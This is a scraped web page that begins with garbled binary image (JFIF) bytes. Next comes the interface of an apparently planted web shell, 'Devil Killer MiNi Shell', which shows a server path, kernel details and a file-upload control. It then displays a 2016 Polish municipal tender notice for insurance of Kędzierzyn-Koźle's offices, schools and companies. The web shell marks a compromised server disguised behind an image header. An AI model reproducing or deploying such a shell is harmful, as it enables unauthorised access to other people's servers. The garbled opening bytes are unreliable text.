JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161117/345181-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://przetargi.kedzierzynkozle.pl/' target='_blank'>http://przetargi.kedzierzynkozle.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 345181 - 2016
              z dnia 2016-11-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kędzierzyn-Koźle: Ubezpieczenie mienia i odpowiedzialności  cywilnej Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w 2017r.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />1. Gmina Kędzierzyn-Koźle, Urząd Miasta Kędzierzyn-Koźle z siedzibą: 47-200 Kędzierzyn-Koźle ul. Piramowicza 32, REGON 000524507, Osoba do kontaktu: Karolina Mazur, Tel. 77 403 44 51,
                <br />2. Miejski Ośrodek Pomocy Społecznej, ul. Mikołaja Reja 2A, Kędzierzyn-Koźle, REGON 004501207, Osoba do kontaktu: Dyr. Danuta Ceglarek	, Tel. 77 483 59 49 , d.ceglarek@mops-kkozle.pl,
                <br />3. Zespół Obsługi Oświaty i Wychowania, ul. Mikołaja Reja 2, Kędzierzyn-Koźle, REGON 530546094, Osoba do kontaktu: Dyr. Alina Janik, Tel. 77 406 03 40, dyrektor@zooiwkk.pl,
                <br />4. Środowiskowy Dom Samopomocy PROMYCZEK , ul. Piotra Skargi 25, Kędzierzyn-Koźle, REGON 531289357, osoba do kontaktu: Dyr. Anna Brągiel, Tel. 77 472 40 30, promycze@poczta.onet.pl,
                <br />5. Miejski Ośrodek Sportu i Rekreacji 	al. Jana Pawła II 29, Kędzierzyn-Koźle, REGON 532437162, osoba do kontaktu: Dyr. Zenona Kuś, Tel. 77 472 31 38, sekretariat@mosirkk.pl,
                <br />6. Miejski Zakład Cmentarny 	ul. Bałtycka 2, Kędzierzyn-Koźle, REGON160374096, osoba do kontaktu: Dyr. Piotr Pabisz, tel. 77 483 40 76 , mzc_kk@onet.pl,
                <br />7. Miejski Zarząd Budynków Komunalnych, ul. Grunwaldzka 4-6, Kędzierzyn-Koźle, REGON 530859315, osoba do kontaktu: Dyr. Stanisław Węgrzyn, tel. 77 483 49 81, mzbk_kedzierzyn@pro.onet.pl,
                <br />8. Miejski Ośrodek Kultury , al. Jana Pawła II nr 27, Kędzierzyn-Koźle, REGON000281660, osoba do kontaktu: Dyr. Piotr Gabrysz, tel. 77 480 25 40, mok@mok.com.pl,
                <br />9. Miejska Biblioteka Publiczna , ul. Rynek 3, Kędzierzyn Koźle, REGON 530548667, osoba do kontaktu: Dyr. Izabela Migocz, tel. 77 482 37 42, ,
                <br />10. Muzeum Ziemi Kozielskiej w Organizacji, ul. Kraszewskiego 5B, Kędzierzyn-Koźle, REGON 531303011, Dyr. Bolesław Bezeg, Tel. 77 405 26 06 ,
                <br />11. Regionalne Centrum Zagospodarowania i Unieszkodliwiania Odpadów Czysty Region Sp. z o.o.	ul. Naftowa 7, Kędzierzyn-Koźle, REGON161502260, osoba do kontaktu: Krzysztof Ważny , Tel. 77 446 11 90 , sekretariat@czystyregion.pl,
                <br />12. Usługi Komunalne Sp. z o.o. w Kędzierzynie-Koźlu 	ul. Grunwaldzka 42/44, Kędzierzyn-Koźle REGON 530869503, osoba do kontaktu: Iwona Śniegucka, tel. 77 483 42 53, ukom@ukom.pl<br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Kędzierzyn-Koźle, Wydział Zamówień Publicznych, krajowy numer identyfikacyjny
              52450700000, ul.
              ul. Piramowicza 
              32,
              47200  
              Kędzierzyn-Koźle, woj.
              opolskie, państwo
              Polska, tel.
              77 40 34 451, e-mail
              , faks
              77 40 34 451.
              <br />
              Adres strony internetowej (URL): www.kedzierzynkozle.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />Zamawiającym jest Gmina Kędzierzyn-Koźle działająca, jako wspólny Zamawiający w imieniu własnym oraz w imieniu stron porozumienia reprezentująca Zamawiających na podstawie porozumienia z 24.10.2016 r. w sprawie wspólnego przeprowadzania i udzielenia zamówienia na usługę ubezpieczenia mienia i odpowiedzialności Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w roku 2017 oraz Zarządzenia nr 835/Or/2016 z dnia 28.04.2016 r. w sprawie wspólnego przeprowadzania i udzielenia w 2017-2018 r. zamówień publicznych na określone dostawy i usługi przez Urząd Miasta Kędzierzyn-Koźle i jednostki organizacyjne Gminy Kędzierzyn-Koźle oraz wyznaczenia jednostki właściwej do przeprowadzenia postępowania o udzielenie tych zamówień.  Niniejsze zamówienie jest udzielane na mocy art. 16 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2015r, poz. 2164 z późn. zm.). </div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://przetargi.kedzierzynkozle.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://przetargi.kedzierzynkozle.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać pod rygorem nieważności w formie pisemnej, zgodnie z wymaganiami SIWZ.<br />
                Adres:
                <br /> Adres:  Wydział Zamówień Publicznych Urzędu Miasta Kędzierzyn-Koźle, ul. Piramowicza 32/pok. 417, III p 47-200 Kędzierzyn-Koźle.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Ubezpieczenie mienia i odpowiedzialności  cywilnej Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w 2017r.<br /><b>Numer referencyjny: </b>ZP.271.103.2016.KM<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>I. Przedmiotem zamówienia jest:
Ubezpieczenie mienia i odpowiedzialności  cywilnej Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w 2017r.

Część I Zamówienia:
- Wspólny słownik zamówień (CPV): 
Przedmiot główny:
CPV: 66.51.00.00-8
Nazewnictwo wg CPV: usługi ubezpieczeniowe
Przedmioty dodatkowe:
CPV: 66.51.50.00-3
Nazewnictwo wg CPV: usługi ubezpieczenia od uszkodzenia lub utraty
CPV: 66.51.60.00-0
Nazewnictwo wg CPV: usługi ubezpieczenia od odpowiedzialności cywilnej
CPV: 66.51.21.00-3
Nazewnictwo wg CPV: usługi ubezpieczenia od następstw nieszczęśliwych wypadków

Część I Zamówienia obejmuje ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn Koźle oraz komunalnych osób prawnych  w zakresie:
Ubezpieczenie mienia od ognia i innych zdarzeń losowych,
Ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,
Ubezpieczenie odpowiedzialności cywilnej,
Ubezpieczenie szyb od stłuczenia,
Ubezpieczenie następstw nieszczęśliwych wypadków,
Ubezpieczenie maszyn od uszkodzeń od wszystkich ryzyk.
Ubezpieczenie maszyn budowlanych od uszkodzeń.

w następujących jednostkach organizacyjnych Gminy Kędzierzyn-Koźle:
1.	Urząd Miasta Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, Kędzierzyn-Koźle
Wydział Administracyjno-Gospodarczy
Wydział Zarządzania Kryzysowego
Biuro Informacji i Promocji Miasta
Wydział Zarządzania Drogami 
Wydział Ochrony Środowiska i Rolnictwa
Straż Miejska 
2.	Miejski Ośrodek Pomocy Społecznej, ul. Mikołaja Reja 2A, Kędzierzyn-Koźle
3.	Zespół Obsługi Oświaty i Wychowania, ul. Mikołaja Reja 2, Kędzierzyn-Koźle;
4.	Żłobek nr 1, ul. Filtrowa 13, Kędzierzyn-Koźle 
5.	Żłobek nr 3, ul. Piotra Skargi 25, Kędzierzyn-Koźle
6.	Żłobek nr 6, ul. 1 Maja 7, Kędzierzyn-Koźle
7.	Żłobek nr 10, ul. Kazimierza Wielkiego 6, Kędzierzyn-Koźle
8.	Publiczne Przedszkole nr 2, ul. Kozielska 3, Kędzierzyn-Koźle
9.	Publiczne Przedszkole nr 5, ul. 1 Maja 5, Kędzierzyn-Koźle
10.	Publiczne Przedszkole nr 6, ul. Tadeusza Kościuszki 21, Kędzierzyn-Koźle
11.	Przedszkole Publiczne nr 7, ul. Jordanowska 16, Kędzierzyn-Koźle 
12.	Publiczne Przedszkole nr 8, ul. Romana Dmowskiego 5, Kędzierzyn-Koźle
13.	Publiczne Przedszkole nr 9, ul. Harcerska 16, Kędzierzyn-Koźle 
14.	Przedszkole Publiczne nr 10, ul. Władysława Broniewskiego 5, Kędzierzyn-Koźle
15.	Przedszkole Publiczne nr 11, ul. Mikołaja Reja 14, Kędzierzyn-Koźle
16.	Publiczne Przedszkole nr 12, ul. Bolesława Chrobrego 28, Kędzierzyn-Koźle
17.	Publiczne Przedszkole nr 13, ul. Piastowska 10, Kędzierzyn-Koźle
18.	Przedszkole Publiczne nr 14, ul. Franklina Delano Roosevelta 13, Kędzierzyn-Koźle
19.	Przedszkole Publiczne nr 15, ul. Spółdzielców 3, Kędzierzyn-Koźle
20.	Publiczne Przedszkole nr 17, ul. Karola Szymanowskiego 29, Kędzierzyn-Koźle
21.	Publiczne Przedszkole nr 18, ul. Sławięcicka 96 B, Kędzierzyn-Koźle
22.	Przedszkole Publiczne nr 21, ul. Filtrowa 13, Kędzierzyn-Koźle
23.	Przedszkole Publiczne nr 22 im. Czesława Janczarskiego, ul. 9 Maja 4, Kędzierzyn-Koźle
24.	Przedszkole Publiczne nr 23, ul. Wierzbowa 4, Kędzierzyn-Koźle
25.	Przedszkole Publiczne nr 24, ul. Leszka Białego 7, Kędzierzyn-Koźle
26.	Publiczne Przedszkole nr 26, ul. Bolesława Śmiałego 5, Kędzierzyn-Koźle
27.	Publiczna Szkoła Podstawowa nr 1 im. Powstańców Śląskich, ul. Kościelna 19, Kędzierzyn-Koźle 
28.	Publiczna Szkoła Podstawowa nr 5 im. Adama Mickiewicza, ul. Tadeusza Kościuszki 41, Kędzierzyn-Koźle
29.	Publiczna Szkoła Podstawowa nr 6 im. Marii Skłodowskiej-Curie, ul. Pawła Stalmacha 20, Kędzierzyn-Koźle
30.	Publiczna Szkoła Podstawowa nr 9 im. Jurija Gagarina, ul Gagarina 3, Kędzierzyn-Koźle
31.	Publiczna Szkoła Podstawowa nr 11 im. Władysława Broniewskiego, ul Partyzantów 30, Kędzierzyn-Koźle
32.	Publiczna Szkoła Podstawowa nr 12 im. Kadeta Zygmunta Kuczyńskiego, ul Piastowska 30, Kędzierzyn-Koźle
33.	Publiczna Szkoła Podstawowa nr 20, ul. Archimedesa 25, Kędzierzyn-Koźle
34.	Publiczne Gimnazjum nr 1 im. Orląt Lwowskich, ul. Grzegorza Piramowicza 30, Kędzierzyn-Koźle
35.	Publiczne Gimnazjum nr 3 im. Kardynała Stefana Wyszyńskiego, ul. Piotra Skargi 11, Kędzierzyn-Koźle
36.	Publiczne Gimnazjum nr 4 im. Karola Wojtyły, ul. 1 Maja 3, Kędzierzyn- Koźle
37.	Zespół Szkolno-Przedszkolny, ul. Jana Brzechwy 80;82, Kędzierzyn-Koźle
38.	Zespół Szkół Miejskich nr 1
- ul. Mieszka I nr 4, Kędzierzyn- Koźle 
- ul. Nowowiejska 8, Kędzierzyn-Koźle; 
39.	Zespół Szkół Miejskich nr 2, ul. Karola Szymanowskiego 19, Kędzierzyn-Koźle
40.	Zespół Szkół Miejskich nr 3, ul. Szkolna 3, Kędzierzyn-Koźle
41.	Zespół Szkół Miejskich nr 4, ul. Sławęcicka 96, Kędzierzyn-Koźle
42.	Zespół Szkół Miejskich nr 5, ul. Przodowników Pracy 13, Kędzierzyn- Koźle
43. Środowiskowy Dom Samopomocy PROMYCZEK, ul. Piotra Skargi 25, Kędzierzyn-Koźle
44. Miejski Ośrodek Sportu i Rekreacji, al. Jana Pawła II 29, Kędzierzyn-Koźle
45. Miejski Zakład Cmentarny, ul. Bałtycka 2, Kędzierzyn-Koźle
46. Miejski Zarząd Budynków Komunalnych, ul. Grunwaldzka 4-6, Kędzierzyn-Koźle

oraz w następujących komunalnych osobach prawnych:

47. Miejski Ośrodek Kultury, al. Jana Pawła II nr 27, Kędzierzyn-Koźle
48. Miejska Biblioteka Publiczna, ul. Rynek 3, Kędzierzyn Koźle
49. Muzeum Ziemi Kozielskiej w Organizacji, ul. Kraszewskiego 5B, Kędzierzyn-Koźle
50. Regionalne Centrum Zagospodarowania i Unieszkodliwiania Odpadów Czysty Region Sp. z o.o., ul. Naftowa 7, Kędzierzyn-Koźle
51. Usługi Komunalne Sp. z o.o. w Kędzierzynie-Koźlu, ul. Grunwaldzka 42/44, Kędzierzyn-Koźle 

- 	pozostałe lokalizacje zgodnie z wykazem budynków i budowli oraz wykazem lokalizacji w załączniku nr 6 do SIWZ


Część II Zamówienia:
Przedmiot główny:
CPV: 66.51.00.00-8
Nazewnictwo wg CPV: usługi ubezpieczeniowe

Przedmioty dodatkowe:
CPV: 66.51.21.00-3
Nazewnictwo wg CPV: usługi ubezpieczenia od następstw nieszczęśliwych wypadków
CPV: 66.51.41.10-0
Nazewnictwo wg CPV: usługi ubezpieczeń pojazdów mechanicznych
CPV: 66.51.61.00-1	
Nazewnictwo wg CPV: usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej

Część II Zamówienia obejmuje ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w 2017r. w zakresie ubezpieczeń komunikacyjnych:
ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,
ubezpieczenie auto casco,
ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów,
ubezpieczenie assistance.

w następujących jednostkach organizacyjnych Gminy Kędzierzyn-Koźle:
1.	Urząd Miasta Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, Kędzierzyn-Koźle
Wydział Administracyjno-Gospodarczy
Wydział Zarządzania Kryzysowego
Wydział Zarządzania Drogami 
Straż Miejska
2.	Miejski Ośrodek Sportu i Rekreacji, al. Jana Pawła II 29, Kędzierzyn-Koźle
3.	Miejski Zakład Cmentarny, ul. Bałtycka 2, Kędzierzyn-Koźle
4.	Miejski Zarząd Budynków Komunalnych, ul. Grunwaldzka 4-6, Kędzierzyn-Koźle

oraz w następujących komunalnych osobach prawnych:
1.	Miejski Ośrodek Kultury, al. Jana Pawła II nr 27, Kędzierzyn-Koźle
2.	Regionalne Centrum Zagospodarowania i Unieszkodliwiania Odpadów Czysty Region Sp. z o.o., ul. Naftowa 7, Kędzierzyn-Koźle
3.	Usługi Komunalne Sp. z o.o. w Kędzierzynie-Koźlu, ul. Grunwaldzka 42/44, 
Kędzierzyn-Koźle 

Część III Zamówienia:
Przedmiot główny:
CPV: 66.51.00.00-8
Nazewnictwo wg CPV: usługi ubezpieczeniowe
Przedmioty dodatkowe:
CPV: 66.51.21.00-3
Nazewnictwo wg CPV: usługi ubezpieczenia od następstw nieszczęśliwych wypadków

Część III Zamówienia obejmuje ubezpieczenie Gminy Kędzierzyn-Koźle w 2017 r. w zakresie ubezpieczeń następstw nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych Gminy Kędzierzyn-Koźle:
- ubezpieczenie imienne,
- ubezpieczenie bezimienne.
Część IV Zamówienia:
Przedmiot główny:
CPV: 66.51.00.00-8
Nazewnictwo wg CPV: usługi ubezpieczeniowe
Przedmioty dodatkowe:
CPV: 66.51.63.00-3
Nazewnictwo wg CPV: usługi ubezpieczenia jednostek pływających od odpowiedzialności cywilnej
CPV: 66.51.41.50-2
Nazewnictwo wg CPV: usługi ubezpieczenia statków
Część IV Zamówienia obejmuje ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn-Koźle w 2017 r. w zakresie ubezpieczenia jednostek pływających:
-	ubezpieczenie casco 
-	ubezpieczenie odpowiedzialności cywilnej 
-	ubezpieczenie nnw pasażerów
Wymagania określone przez Zamawiającego dotyczące przedmiotu zamówienia:
Zamawiający wymaga, aby Zamawiający (jednostki Zamawiającego) nie byli zobowiązani do pokrywania strat Wykonawcy działającego w formie towarzystwa ubezpieczeń wzajemnych przez wnoszenie dodatkowej składki, zgodnie z art. 111 ust. 2 Ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r. poz. 1844).

Wykonawca musi posiadać ogólne (szczególne) warunki ubezpieczenia, zwane dalej OWU, wszystkich ubezpieczeń określonych w przedmiocie zamówienia.

Wymóg zatrudnienia na umowę o prace. Na podstawie art. 29.ust. 3a ustawy Pzp. Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, osób wykonujących następujące czynności  niezbędne do realizacji zamówienia:
	czynności administracyjne w trakcie realizacji zamówienia związane z wystawianiem umów ubezpieczenia i rozliczaniem płatności.
Sposób dokumentowania zatrudnienia, uprawnienia zamawiającego w zakresie kontroli oraz sankcje z tyt. niespełnienia wymagań zostały określone w części II SIWZ- Istotne postanowienia umowy dla każdej z części.

Szczegółowy opis części zamówienia zawarty jest w CZĘŚCI III - Opis Przedmiotu Zamówienia (OPZ) - PROGRAM UBEZPIECZENIA.
<br /><br /><b>II.5) Główny kod CPV: </b>66510000-8<br /><b> Dodatkowe kody CPV:</b>66515000-3,
                66516000-0,
                66512100-3,
                66514110-0,
                66516100-1,
                66516300-3,
                66514150-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12
                    data rozpoczęcia: 01/01/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
